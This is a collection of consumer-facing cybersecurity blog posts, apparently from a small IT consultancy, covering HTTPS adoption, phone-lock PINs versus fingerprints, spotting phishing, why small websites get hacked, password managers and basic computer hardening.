10 Reasons Your Site Should Be HTTPS

/in , /by

If you have a website that is still HTTP, you should seriously consider upgrading to HTTPS. While it’s true that historically HTTPS websites were limited to e-commerce websites, HTTPS is now the standard. This post will explain what HTTPS is and give you 10 reasons to make sure that you upgrade to HTTPS as soon as possible.

What is HTTPS?

HTTPS is a way to encrypt information that is sent between a browser and a web server. This protects users of your website from man in the middle attacks, where someone steals information that is being sent to a website, like credit card information or logins.

What is an SSL Certificate?

An SSL Certificate is a set of data files that you add to your server to secure an encrypted connection between a browser and your server. When installed, a green padlock will display in when users visit your site to indicate that the site is secure.

Are SSL and HTTPS the same thing?

These terms are two sides of the same process of creating an encrypted website. An SSL certificate is the product that is needed and HTTPS is the result of having that certificate on your server. You cannot have one without the other.

If your website isn’t secure yet, it definitely should be. 

Reasons why you should upgrade to HTTPS immediately:

  1. Improved Google Rankings
  2. HTTPS alerts by Google Search Console
  3. Browsers Increasing Alerts for Non-secure Sites
  4. Better Security
  5. Visible Security Signals for Visitors
  6. Increased Conversions
  7. Increase in Average Transaction Value
  8. Boost in Customer Confidence
  9. Required for any type of e-commerce transaction
  10. There Is No Reason Not To Have One

Improved Google Rankings/strong>

Google wants to ensure that its customers have the best online user experience. Understandably, Google doesn’t want browsers to search insecure websites. Because of that, Google’s ranking algorithm now favors HTTPS sites. If your website isn’t secure, it could be getting outranked by your competitors that are secure.

HTTPS alerts by Google Search Console

Google has been sending notices to webmasters via the Google Search Console if a login page or any page collecting any password is not secured over HTTPS. Anything in Google Search Console should be considered important in the eyes of Google and their algorithms.

Browsers Increasing Alerts for Non-secure Sites

Since January 2017, Google provides security warnings in Google Chrome for users if there is no valid SSL certificate on a web page. Google marks these sites as non-secure. Other browsers are following Google Chrome’s lead on this.

Better Security

This is an obvious benefit for everyone. HTTPS protects user information from potential hackers. Better security is a better experience for all.

Visible Security Signals for Visitors

Security is one of the biggest concerns visitors have, preventing many of them from shopping or providing their information online. One of the key benefits of having an SSL certificate is the sign that you can display on your website indicating it is secure.

Increased Conversions

This is another relatively straightforward benefit of having a secure website. The more secure your site is, the more people will feel comfortable interacting with the site. Those interactions may be filling out contact forms, registering for events, signing up to be notified about something in the future, becoming a member, or buying something online.

Increase in Average Transaction Value

There is often also an increase in the average transaction value on an ecommerce site once a site is more secure. With online purchases, part of the concern that users have with security has to do with the impact on the amount being paid. The higher the transaction amount, the greater the fear of being scammed.

Boost in Customer Confidence

A secure connection gives website visitors peace of mind that your website can be trusted and their information is safe. This is particularly important in fields where trust is paramount – lawyers, doctors, financial services, insurance, real estate.

Required for Any Type of E-Commerce Transaction

If you sell anything online, you have to have HTTPS. Most credit card processors won’t even let you sell anything online without it. But if you own a website and you sell anything online, and you don’t have HTTPS, make sure you upgrade immediately.

There Is No Reason Not To Have One

The only issues experienced with SSL certificates occur when they expire or when implementation is incorrect. To that end, be sure to keep your subscriptions active and be sure to update the primary domain for your website to force the https version. That is, whether www or non-www (pick your preference), all other versions should both 301-redirect to and point to the https version with any canonical tags.

How Do You Switch Your Site To HTTPS?

If you’re reading this article and your website is hosted by Connect4 Consulting, contact us and we can easily fix this for you.

 

A PIN is Better Than A Fingerprint For Protecting Private Data on Your Phone

/in , /by

A PIN is better than a fingerprint for protecting private data on your phone. Most modern smartphones now have fingerprint scanners. They are great for adding an extra level of security to your phone and make it really convenient to log into accounts and pay for purchases. But it turns out that in the United States, they don’t help you maintain your privacy in front of law enforcement.

In October 2014, a Virginia court ruled that suspects can be asked to unlock their phones using their fingerprints. Apparently this wasn’t tested until this February, when a judge in Los Angeles issued a warrant requiring a woman accused of identity theft to unlock her iPhone with her fingerprint.

The key in this case is that had the woman used a pin instead of her fingerprint to lock her phone, she wouldn’t have had to unlock it for the police. This is because the Fifth Amendment, which protects people from incriminating themselves during legal proceedings, prevents government agencies from forcing people to turn over memorized codes. However, a fingerprint or any other biometric identifier, can be collected.

There are several ways to fool fingerprint scanners, including the use of tape, so if someone could find you, they could make a copy and use it to access your phone.

 

Cyber Security – Will Our Risk Decrease If We Have Fewer Devices?

/in , /by

This is a good question but I don’t think it’s immediately a cyber security question. There is definitely a correlation between the number of devices you have to manage and potential risk. And it’s possible there’s a cost savings by having a laptop instead of multiple devices as there are fewer computers that need to be serviced. But I think your actual cyber security risk goes up when you give people mobile devices. Laptops can be used in many unsafe places and their versatility might actually increase security problems.

The real answer is the educational one. If people make the right choices, then cyber security risks can be minimized.

Here are some pointers to help you create an action plan to strengthen your company’s defenses against hackers:

1) Failure to cover cyber security basics – software and operating system updates

2) Not understanding what generates corporate cyber security risks

3) Lack of a cyber security policy

As part of their cyber security policies, companies should:

  • identify risks related to cyber security
  • establish cyber security governance
  • develop policies, procedures and oversight processes
  • protect company networks and information
  • identify and address risks associated with remote access to client information and funds transfer requests
  • define and handle risks associated with vendors and other third parties
  • be able to detect unauthorized activity.

4) Confusing compliance with cyber security

5) The human factor – the weakest link

6) Bring Your Own Device (BYOD) Policy and the Cloud

7) Funding, talent and resource constraints

Think of this security layer as the immune system of your company that needs funding and talent to ensure that you don’t experience severe losses as a consequence of cyber-attacks. A good approach would be to set reasonable expectations towards this objective and allocate the resources you can afford.

8) No information security training

Employee training and awareness is essential when covering your base in terms of information security.

Another quick look at the most common file types that hackers use to penetrate your system and trigger attacks that can lead to data leakage tells you what types of actionable advice you could include in your employees’ trainings on cyber security.

9) Lack of a recovery plan

Being prepared for a security attack means to have a thorough plan of what can happen to prevent the cyber-attack, but also minimize the damage if is takes place.

10) Constantly evolving risks

Polymorphic malware is harmful, destructive or intrusive computer software such as a virus, worm, Trojan or spyware that constantly changes, making it difficult to detect with anti-malware programs. That is why you should take into account that your company might need an extra layer of protection, on top of the antivirus solution.

The first line of defense must be ensured by a product that can act proactively to identify malware, block access to hacker controlled servers and stop data leakage, but also keep your system protected by patching vulnerabilities (usually, applications that are not up to date, such as Flash or Java).

 

Ten Tips For Spotting Phishing Emails

/in , /by

Every day millions of phishing emails are sent to unsuspecting victims all over the world. I know because I receive five or six myself in my spam folder every day. While some of these messages are so outlandish it’s obvious they are fraud, others can be a bit more convincing. So how do you tell the difference between legitimate emails and phishing emails? Unfortunately there is no single way, but this post provides ten tips for spotting a phishing emails.

Ten Tips For Spotting Phishing Emails

#1 URLs contain a misleading domain name

People who launch phishing scams often rely on victims who don’t know much about technology or how the DNS naming structure for domains works. The last part of a domain name is the most telling. For example, the domain name info.gabeseiden.com would be a child domain of gabeseiden.com because gabeseiden.com appears at the end of the full domain name (on the right-hand side). Conversely, gabeseiden.com.maliciousdomain.com would clearly not have originated from gabeseiden.com because the reference to gabeseiden.com is on the left side of the domain name.

This happens all the time, especially when the phishing criminal uses a trusting name like Microsoft or Apple or even the IRS. The resulting domain name looks something like this: Microsoft.maliciousdomainname.com.

#2 The message is poorly written with grammar and spelling mistakes

Whenever a company sends out a message on behalf of the company as a whole, the message is usually reviewed for spelling, grammar, and legality. So if a message is filled with poor grammar or spelling mistakes, it probably didn’t come from a major corporation’s legal department.

#3 The message asks for personal information

This is usually a major red flag. No matter how official an email message looks, it’s always a bad sign if the email asks for personal information. Your bank or credit card company already know your account number and social security number.

#4 The message contains a mismatched url

One of the first things you should check in a suspicious email message are any embedded URLs. Often the URL in a phishing message will appear to be perfectly valid but if you hover your mouse over the top of the URL, you see the actual hyperlinked address (at least in Outlook) and if the hyperlinked address is different from the address that is displayed, the message is probably fraudulent or malicious.

#5 The message looks too good to be true

If you receive a message from someone unknown to you who is making big promises, the message is probably a scam.

#6 You’re asked to send money to cover expenses

You might not get hit up for cash in the initial message. But sooner or later, phishing criminals will ask for money to cover expenses, taxes, fees, or something similar. If that happens, you can bet that it’s a scam.

#7 You didn’t initiate the action

If you get an email congratulating you on winning the lottery, but you never bought a ticket, you can bet that it’s a scam. If you didn’t do something to initiate the action, it is probably a scam.

#8 The message makes unrealistic threats

Most phishing scams try to trick people into giving up cash or sensitive information by promising instant money. However, some phishing scams use intimidation to scare victims into giving up information. If a message makes unrealistic threats, it’s probably a scam. Let me give you an example.

I once received an email from what looked like the IRS. Everything looked legitimate except for one thing. The letter said my account had been compromised and that if I did not submit a form (which asked for my social security number) along with two picture IDs, my assets would be seized.

I knew this was a scam because the IRS doesn’t send out emails like this. The IRS sends out its threats via snail mail.

#9 The message appears to be from a government agency

Government agencies in the U.S. don’t normally use email as an initial point of contact.

#10 Something is fishy

If you receive a message that seems suspicious, it’s usually in your best interest to avoid acting on the message. On the off chance that it’s a real message, usually the real person will find another way to contact you.

How to stay ahead of cyber criminals

/in , , /by

It’s no secret that cyber attacks are becoming more increasingly sophisticated, stealthy, and, as a result, commonplace. We have seen high profile security breaches at Target, JP Morgan, Home Depot, and the US Government. Attackers can infiltrate practically any “secure” environment and maneuver undetected for months at a time while they scope out the best practice (for them) for a cyber attack. So the question for us is – how do we stay ahead of cyber criminals?

This is ultimately a cat and mouse game and it’s clear that the cyber criminals play the cat in this game. As cyber attackers become increasingly aware of cyber security measures, both large and small organizations must be on the defense and continuously learn about potential warning signs. Here are a few helpful tips to help you stay ahead of cyber attacks and reduce the risk of data breaches.

Constant Change

There’s one thing that cyber criminals and the rest of us have in common – none of us like change. We want to keep systems and processes static because it makes life and work easier. Attackers love static systems and processes because it makes it easier for them to study their subjects, learn the ins and outs, and figure out exactly how they can compromise your data. If you want to make it difficult for sophisticated cyber attackers, create a culture that thrives on change.

Monitor for Usage of Irrelevant Information

Cyber criminals do their homework before launching an attack. Sometimes their data is misinformed or incomplete. You should monitor for activity that doesn’t make sense for your organization.

A typical example of an irrelevant information scenario is the “former employee” situation. In this case, an attacker targets a specific user from your list of employees, not knowing that the person no longer works for your organization. Because the employee no longer works for you, that employee should not be taking actions within the company’s network and the network shouldn’t be contacting them. Spotting this suspicious activity can help you prevent data breaches.

Avoid Alarm Fatigue

Security appliances are more sensitive than ever to better detect potential threats, but the sharp increase in alerts leaves security teams running ragged.

It is impossible to launch a full-scale investigation every time your security appliances send a notification. Instead, you must monitor your organization for signs of alarm fatigue and resolve them as soon as possible. If you stop monitoring for serious notifications, you are sure to miss the real issues as they come up.

Invest in Cyber Security Education

Did you know that human error is the leading cause of data loss? Cyber security training and education teaches employees the importance of changing passwords and monitoring for suspicious activity to cut down on the amount of human errors.

One major part of training employees for better cyber security is preparing them for phishing schemes. In Phishing attacks, cyber criminals often send out seemingly legitimate emails, mimicking companies like PayPal or eBay in an attempt to lure readers to click on a fake link. While the link seems real and the landing page is set up with real logos, the site is built to filter sensitive data to cyber criminals. The email might mention an issue with the user’s account and lead them to a site that requests PIN numbers, credit card data and more. These can be tough to spot, but there are warnings to look out for.

All of the security solutions in the world can’t protect your network if your workforce is willingly (but unknowingly) giving cyber criminals access to it. Creating a truly secure workforce requires ongoing education and training.

 

Apple vs. The FBI – What’s At Stake?

/in , , /by

Apple and the FBI spent more than five hours on Monday testifying before Congress over the ongoing San Bernadino terrorist iPhone saga. While there weren’t any conclusions, it was a chance for both sides to lay out their case.

To recap, the FBI wants Apple to help it unlock an encrypted iPhone tied to the San Bernardino case by building a customized version of iOS. Apple, on the other hand, argues that doing so would compromise security of every iPhone moving forward.

The problem is that allowing the government to unlock a single device has huge implications for the future of privacy. This case is not about the San Bernadino terrorists. I don’t even think the FBI thinks it will gain any new information pertinent to their case. This is all about establishing precedent for future cases.

The Department of Justice is not asking Apple to turn off the phone’s security or bypass the pin. It wants Apple to make it easier for the FBI to get into the device by guessing the passcode, without destroying the encrypted data on the phone. Specifically, the order signed by US magistrate judge Sheri Pym says Apple “shall assist in enabling the search” of the suspect’s iPhone by creating a special firmware that would only work on that particular device.

The firmware that the judge wants Apple to create would disable the security feature that erases the phone’s contents after 10 unsuccessful login attempts. It would also disable the time limits that grow longer after each failed attempt and allow authorities to connect the phone to a computer to “brute force” the passcode so that officials don’t have to tap it into the phone by hand.

Apple isn’t arguing about technical feasibility; it’s concerned with legal precedent. “The implications of the government’s demands are chilling,” Cook says in his letter. “If the government can use the All Writs Act to make it easier to unlock your iPhone, it would have the power to reach into anyone’s device to capture their data.” The company is afraid that once a backdoor is created, other agencies and governments will come demanding access in the name of global security.

Given what we now know about the government’s technological abilities, I find it hard to believe that the NSA or CIA doesn’t already have the capability to unlock the phone.

A hearing on Apple’s appeal is scheduled for March 22nd. It’s almost certain that the the decision will be appealed by the losing side. The case could go then to a district court judge, and if challenged there, to the U.S. Court of Appeals for the Ninth Circuit. Ultimately, as many legal experts have predicted, the case could end up in the Supreme Court.

Why Websites Get Hacked

/in , , , , /by

I spend a fair amount of time working on new websites as well as fixing websites that have been hacked and this question always comes up:

Why would anyone ever hack my website? I’m just a small business owner.

Depending on who you are, websites get hacked for different reasons, but there are a few specific explanations.

Automation is key

Websites attacks that target small businesses and smaller websites are fully automated. The benefits of automated attacks provide hackers the following benefits:

  • Mass exposure
  • Reduction in overhead
  • Tools for everyone regardless of skill
  • Dramatically increases the odds of success (for the hacker)

The majority of these attacks are automated and follow a specific sequence:

  1. Reconnaissance
  2. Identification
  3. Exploitation
  4. Sustainment

While thinking about how these attacks occur, it’s important to address the two types of attacks: attacks of opportunity and targeted attacks.

Attack of Opportunity

Almost all small business website attacks are attacks of opportunity. This means that it’s not one individual or group that is trying to hack into your specific website, but rather a coincidence. Something about your site was caught in the trailing net as they crawl the internet looking for hacking opportunities. It could have been something simple like having a known plugin installed, or maybe displaying the version of a platform (displaying the fact that you’re using an outdated version of WordPress, for example).

According to Sucuri, a website security company, it takes about 40 days for a new website with no content or audience to be identified and added to a bot crawler. Once added, the attacks can begin immediately without any real rhyme or reason. It can be any website; the only commonality is that they are all connected to the internet.

These web crawlers then begin to look for identifying markers. Is the website running WordPress, Joomla, Drupal? If so, is the website running any software with known vulnerabilities or bugs in the code? If the answer is yes, the site will be marked for the next phase of attack, exploitation.

The sequence of events can happen in a matter of minutes, days, or months. It’s not a singular event; it’s ongoing and occurs continuously as the bot crawlers are scanning for vulnerabilities. Once your website is on the list, it will just keep on trying until it succeeds. This is why it is so critical to have someone actively managing your website and – at a bare minimum – updating software.

Targeted Attack

Targeted attacks are often reserved for big businesses, but not always. Think of the NBC hack in 2013 or the Forbes hack in 2014. There are many examples of these attacks lately but it’s obvious why there’s an uptick in this trend. Even though it requires much greater hacking skill, the payoff to the hacker can be huge. A very common type of targeted attack is called a Denial of Service attack in which the attacker works to bring down the availability of your site by overloading it with traffic.

Hacking Motivations & Drivers

Now that you have a better understanding of how these attacks happen, let me unpack some reasons why websites get hacked.

Economic Gains

The most obvious reason why websites get hacked is for economic gain. These are attempts to make money by your audience, either by getting them to click on something or download something.

Drive-by Downloads

A drive-by download is the act of injecting your website with malware and hoping to infect as many website visitors as possible. Think of someone visiting your website and then calling you because they installed a fake piece of software that you supposedly recommended on your website. Then their bank accounts were drained. Scary and very real and devastating.

Black Hat SEO

The other type of strategy are black hat SEO campaigns. These are not as devastating, but can be more lucrative for the hackers. This is the game of abusing your audience by redirecting them to pages that generate affiliate revenue.

System Resources

The business of farming system resources is a huge motivator for hacking groups. Botnets are nothing more than interconnected systems across the internet; these can be desktops, tablets, and even servers and they can be tethered together to perform tasks like Denial of Service attacks simultaneously. These attacks that target your system resources are dangerous because they can happen completely behind the scenes without you knowing what’s going on until you get a notice from your host – or worse, a huge bill – exceeding bandwidth.

Hacktivism

The point of these website attacks often comes down to awareness and frequently consists of a hacker defacing your homepage. This form of attack can be combined with others, but more often than not they are somewhat benign and create more embarrassment to the site owner rather than affecting their site visitors.

Pure Boredom

Unfortunately boredom seems to come into play and often there is no real reason why websites get hacked.

Conclusion – Your Best Defense is Knowledge

It is easy to be overwhelmed by all of this, but we believe that your best defense is knowledge and if there’s any real take-away here, it is that you should

  1. hire someone to manage and maintain your website
  2. update whenever updates are available

Remember, security is not about the elimination of risk. Security is risk reduction. Take what you know and use it to lower your chances of getting hacked.

Ten ways to protect yourself online

/in , , /by

 

Any time you are online you are vulnerable to hackers. Whether you are a sole proprietor or a massive corporation like Sony, your chances of being hacked, scammed, or infiltrated in some way, are unfortunately about the same. Hackers can steal your credit card numbers, tax records and passwords, erase your hard drive, disable your entire computer, and even use your built-in webcam or microphone to spy on you. The most complete way to protect yourself online would be to get offline and disconnect yourself immediately, but that solution is no longer an option for any of us.

To protect yourself online, you should take these 10 steps very seriously:

1. Fortify your passwords

Don’t reuse your passwords. If an attacker gets your password she might try it on all of your accounts. This means that a given password is really only as secure as the least secure service where it’s used. Use a single master password or passphrase along with a password manager like LastPass. Choose strong passwords – short passwords of any kind, even totally random ones like nQ\m=8*x or !s7e&nUY are not strong enough today.

2. Use a password manager

Check out LastPass. This is what I use. There’s a free version that syncs between devices but doesn’t allow you to sync with your mobile phone. The premium version costs just $12/year!

3. Secure your security questions

Beware of security questions. Honest answers to many security questions are often publicly discoverable facts. If you do use factual information in the security questions, make them more secure by adding numbers and other characters. Your cat Fluffy can be F1uff7 instead.

4. All HTTPS all the time

HTTPS will encrypt any stream of data between you and the service, ensuring that anyone using Firesheep or a packet sniffer on a (usually public) Wi-Fi network can’t glean your login data. Never work at a coffee shop or other public wi-fi without it.

5. Turn on Two-Step verification

Facebook and Google both offer the option of 2-Step authentication when you login, meaning you have to enter a secondary pin number which is generated and/or texted to your phone. It’s a complete and utter pain in the ass whenever you’re logged out, but it’s also a pretty safe guarantee that no one will be getting into your account without a heavy-duty targeted attack.

6. Use a secret email address

Publicly available information is the first way a hacker can get their foot in the door. Few things are tossed around more casually than an email address. Don’t give potential hackers a starting point, especially if you use the same login info across multiple sites (which you shouldn’t be doing in the first place!). Instead, create an email address that as few people know about as possible that you use only for account log-ins.

7. Set up  login notifications

Facebook will allow you to receive a text message anytime an unrecognized IP address logs in to your account. You may not prevent a hack, but if you act quickly enough, you can remotely log them out and re-secure your account before they get their hands too deep into your business. Gmail is also set by default to alert you if it notices anything particularly strange with your login activity.

8. Put passwords on your devices

This is a no-brainer and should not require explanation. All of your phones, tablets, laptops, and desktops should have a password.

9. Don’t save your credit card information in your browser

Another no-brainer.

10. Keep an offline backup

Just in case your online backup provider is ever hacked, it’s probably a good idea to have your most important documents backed up using a physical hard drive connected to your computer.

11. Don’t link your accounts

Facebook sign-on certainly makes life easy for you, but imagine what happens when someone steals the phone that doesn’t have a password or hacks your password on your computer.

12. Use email wisely

Email is a great way to keep in touch with friends and family, and as a tool to conduct business. Even if you have good security software on your PC, however, your friends and family might not have the same protection. Be careful about what information you submit via email. Never send your credit-card information, Social Security number, or other private information via email.

Conclusion

Those of you who are very perceptive will note that I couldn’t resist and actually gave you 2 extra tips for protecting yourself online. Data shows that a blog post titled “ten ways to protect yourself online” will do better than the same post titled “twelve ways to protect yourself online”. If I had to hone in on one or two particularly important ways to protect yourself online, I would pick number 1/2 – fortify your passwords/use a password manager and number 12 – use email wisely as the most important ways to protect yourself online.

Do you all agree with me? Did I miss anything?

If You Aren’t Using a Password Manager, It’s Time To Start Using One Now

/in , , /by

Online merchants and secure websites aren’t doing a very good job of keeping your personal information safe. Not a week goes by without news about a major online retailer being hacked. To make matters worse, even those websites that use decent security practices may have been compromised by the recently discovered Heartbleed bug. If the bad guys got your password, you’re in trouble. But if you used that same password at other sites, then you’re really in trouble. The only safe thing to do is to use a different strong password on every site, and the only practical way to do that is with a password manager.

If you aren’t using a password manager, it’s time to start using one now. This is important stuff, well worthy of major procrastination because setting up a password manager involves a considerable amount of time and planning. If you are starting from scratch, chances are good that you are using your browser’s built-in password management feature. There are a variety of password managers but we recommend LastPass and will help walk you through the process. LastPass will import those passwords, delete them from the browser, and turn off the browser’s password management. LastPass goes for a clean sweep, importing from all major browsers.

Beyond The Master Password

Most password managers support authentication using a master password. Since it’s protecting all of your other passwords, that one password needs to be really strong. But if that’s the only protection for your data, a crook who manages to steal your master password can access all of your data. The best password managers offer two-factor authentication.

LastPass 3.0 Premium can be configured for fingerprint-based authentication. LastPass supports authentication via the Google Authenticator mobile app.

Password Capture and Replay

Most, but not all, password managers integrate with the browser to capture login credentials as you enter them and replay those credentials when you revisit the site. LastPass goes a step beyond, actively detecting and managing password change events and capturing credentials as you sign up for a new service.

Quite a few password managers let you log in to your password storehouse from any browser, so you can look up credentials even when using someone else’s computer. Among these are Norton Identity SafeRoboForm Everywhere 7, and Keeper 5.0; LastPass and Dashlane also offer this feature. F-Secure, by contrast, doesn’t allow any online access, considering it a potential security risk.

Form Filling and Personal Data

Given that most password managers already have the ability to fill your username and password into a login form, it’s not surprising that many also serve as form fillers for personal data. LastPass will cleverly offer to capture what you’ve entered if it sees that you are filling a form manually.

LastPass can store various types of ID data such as passports and driver’s licenses.

Free Protection

The free edition of LastPass has almost everything found in the premium; support for mobile devices is the big exception. LastPass Premium costs only a dollar a month. That’s not a lot, considering what LastPass is protecting.

Security Checkup

Virtually every password manager will report the strength of your master password.  And virtually every product will generate strong, random passwords for you on demand.

LastPass takes this concept a step further by offering a security report listing all of your passwords and rating the strength of each. They also report on duplicates—passwords you’ve used on more than one site. And they make it easy to upgrade all your passwords to improve security.

 

 

 

 

Four Tips for Securing Your Computer

/in , /by

Unfortunately the #1 cause of viruses and malware is the user – that’s you. If it was possible to take the user out of the equation, computers would be much more secure. Obviously that’s not practical so I’m going to offer you four relatively easy tips for securing your computer.

How to Secure Your Computer

Run the computer as a limited user account.

This will prevent the installation of software. Never run as an administrator. If you are, go to the control panel and create a new user with limited permissions. For you parents out there, you can create a limited account for your child and then set of parenting controls on it to set limits on the hours they can use the computer, the games they can access, and the programs they can run. For more information about setting up parenting controls in Windows 7 or Windows 8

Install updates and patches as soon as they are available.

Patches and updates are absolutely critical. Almost all of these are security related and the company that is creating the security update is essentially saying “we’ve found a security loophole and need you to install this so the bad people out there can’t access your private information. Just last week, Apple was in the news for a loophole that allowed what’s called a man in the middle attack, making operations that you think are secure (like online banking, for example) insecure. The reason it’s important to update as soon as the update is available is that the bad guys out there can immediately target users who haven’t the installed the updates and patches. Make sure you always have automatic updates turned on.

Use a router in between your computer and your cable modem.

A router is an additional line of defense. Obviously you want to make sure that the security settings are turned on. Visit GRC.com and run the SHIELDS UP! App. It will test your network to see what parts are vulnerable to attack.

You are the final line of defense.

Each user must be the final line of defense. Avoid things like clicking on unknown links, opening attachments, and going to untrusted sites.